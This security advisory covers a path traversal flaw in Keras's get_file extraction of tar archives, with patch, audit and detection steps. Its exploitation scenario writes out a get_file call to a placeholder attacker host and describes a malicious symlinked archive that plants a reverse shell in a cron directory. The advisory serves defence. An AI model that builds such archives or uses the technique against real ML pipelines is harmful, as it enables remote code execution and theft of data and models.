AI Threat Alert
Upgrade Keras to 3.12.0 immediately — upgrading Python to 3.13.4 alone does NOT fix this, both components must be patched. Any ML pipeline calling keras.utils.get_file with extract=True against a remote or untrusted tar archive is exposed to arbitrary file write on the host filesystem, which trivially escalates to code execution. Audit all training and data ingestion automation for this pattern before your next pipeline run.
Affected Systems
| Package | Ecosystem | Vulnerable Range | Patched |
|---|---|---|---|
| keras | pip | <= 3.11.3 | 3.12.0 |
Do you use keras? You're affected.
Severity & Risk
Recommended Action
- 1. PATCH: pip install 'keras>=3.12.0' — Python upgrade alone is NOT sufficient, both must be updated. 2. AUDIT: Search all codebases and pipeline configs for keras.utils.get_file calls with extract=True; flag any that pull from external or untrusted URLs. 3. WORKAROUND (if patching delayed): Download tar files separately, validate with tarfile.extractall(filter='data') before processing. 4. ISOLATE: Run ML training in containers with AppArmor/seccomp profiles and filesystem mounts restricted to expected data directories. 5. DETECT: Alert on filesystem writes outside designated ML data directories during training jobs — unexpected writes to /etc, /usr, ~/.ssh, or Python site-packages during an ML run indicate active exploitation.
Classification
Compliance Impact
This CVE is relevant to:
Technical Details
NVD Description
The keras.utils.get_file API in Keras, when used with the extract=True option for tar archives, is vulnerable to a path traversal attack. The utility uses Python's tarfile.extractall function without the filter="data" feature. A remote attacker can craft a malicious tar archive containing special symlinks, which, when extracted, allows them to write arbitrary files to any location on the filesystem outside of the intended destination folder. This vulnerability is linked to the underlying Python tarfile weakness, identified as CVE-2025-4517. Note that upgrading Python to one of the versions that fix CVE-2025-4517 (e.g. Python 3.13.4) is not enough. One additionally needs to upgrade Keras to a version with the fix (Keras 3.12).
Exploitation Scenario
Adversary hosts a malicious dataset archive at a URL that appears legitimate — either via a typosquatted dataset mirror, a compromised data host, or a man-in-the-middle on an HTTP download. An MLOps pipeline or data scientist calls keras.utils.get_file('https://attacker-host/imagenet-subset.tar.gz', extract=True). The tar archive contains a symlink entry resolving to /etc/cron.d/ml-runner, followed by a file entry that writes a reverse shell payload to that symlink target. Keras calls tarfile.extractall without filter='data', the symlink resolves outside the destination, and the payload lands on the host. On next cron tick, the attacker has RCE as the ML training user — often with GPU cluster access, model weights, and training data.
Weaknesses (CWE)
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H References
- github.com/keras-team/keras/pull/21760
- github.com/keras-team/keras/security/advisories/GHSA-hjqc-jx6g-rwp9
- github.com/advisories/GHSA-hjqc-jx6g-rwp9
- github.com/keras-team/keras/commit/47fcb397ee4caffd5a75efd1fa3067559594e951
- github.com/keras-team/keras/pull/21760
- github.com/keras-team/keras/security/advisories/GHSA-hjqc-jx6g-rwp9
- huntr.com/bounties/f94f5beb-54d8-4e6a-8bac-86d9aee103f4
- nvd.nist.gov/vuln/detail/CVE-2025-12060
- nvd.nist.gov/vuln/detail/CVE-2025-12638